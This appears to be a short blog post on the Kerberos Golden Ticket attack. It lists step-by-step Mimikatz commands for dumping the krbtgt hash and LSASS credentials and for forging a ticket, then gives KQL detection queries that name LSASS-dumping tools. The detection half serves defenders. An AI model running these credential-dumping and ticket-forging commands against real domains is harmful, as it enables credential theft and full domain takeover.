A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) generated using the krbtgt account hash from Active Directory. With it, attackers can impersonate any user (even Domain Admins) and access any service in the domain.
- Launch Mimikatz .\mimikatz.exe
- Enable Debug Privileges privilege::debug
- Dump the krbtgt Account Hash lsadump::lsa /inject /name:krbtgt
- lsadump::lsa is just one way. Mimikatz provides multiple methods to obtain credentials for Golden Ticket creation, such as:
- lsadump::dcsync → Replicates account data directly from a DC.
- sekurlsa::logonpasswords → Extracts credentials from LSASS in memory.
- sekurlsa::minidump → Loads a dumped LSASS process memory for offline credential extraction.
- Create the Golden Ticket kerberos::golden /user:Administrator /domain: /sid: /krbtgt: /id:500
Defender Detection Ideas
https://attack.mitre.org/techniques/T1558/001/
Suspicious LSASS Parent Processes & Commandline :
DeviceProcessEvents
| where FileName contains "lsass.exe"
| summarize count()by InitiatingProcessFileName
DeviceProcessEvents
| where ProcessCommandLine contains "lsass.exe"
| where
// --- Mimikatz module usage ---
ProcessCommandLine has_any ("sekurlsa", "minidump", "lsass.dmp")
// --- ProcDump dumping LSASS ---
or ProcessCommandLine has_any ("procdump", "-ma", "lsass.dmp")
// --- Rundll32 with comsvcs.dll to dump LSASS ---
or ProcessCommandLine has "comsvcs.dll"
// --- PowerShell invoking Mimikatz ---
or ProcessCommandLine has "Invoke-Mimikatz"
| project
Timestamp ,
DeviceName,
FileName,
ProcessCommandLine,
InitiatingProcessAccountName,
InitiatingProcessParentFileName
| order by Timestamp desc
Top comments (0)